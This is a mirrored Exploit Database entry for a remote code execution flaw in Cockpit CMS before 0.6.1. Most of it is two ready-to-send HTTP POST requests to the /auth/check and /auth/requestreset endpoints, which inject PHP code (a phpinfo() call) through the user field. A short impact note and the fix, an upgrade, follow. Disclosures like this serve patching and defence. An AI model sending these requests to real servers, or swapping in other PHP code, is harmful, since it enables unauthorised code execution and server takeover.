Cockpit CMS 0.6.1 – Remote Code Execution

• Exploit Database
• 30 阅读

• 作者： Rafael Resende
  日期： 2021-01-07
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/49390/

• # Cockpit CMS 0.6.1 - Remote Code Execution
  # Product: Cockpit CMS (https://getcockpit.com)
  # Version: Cockpit CMS < 0.6.1
  # Vulnerability Type: PHP Code Execution
  # Exploit Author: Rafael Resende
  # Attack Type: Remote
  # Vulnerability Description
  # Cockpit before 0.6.1 allows an attacker to inject custom PHP code and achieve Remote Command Execution via registerCriteriaFunction in lib/MongoLite/Database.php. Disclosed 2020-01-06.
  
  # Exploit Login
  POST /auth/check HTTP/1.1
  Host: example.com
  User-Agent: Mozilla/5.0
  Content-Type: application/json; charset=UTF-8
  Content-Length: 52
  Origin: https://example.com
  
  {"auth":{"user":"test'.phpinfo().'","password":"b"}}
  
  # Exploit Password reset
  POST /auth/requestreset HTTP/1.1
  Host: example.com
  User-Agent: Mozilla/5.0
  Content-Type: application/json; charset=UTF-8
  Content-Length: 28
  Origin: https://example.com
  
  {"user":"test'.phpinfo().'"}
  
  ## Impact
  Allows attackers to execute malicious codes to get access to the server.
  
  ## Fix
  Update to versions >= 0.6.1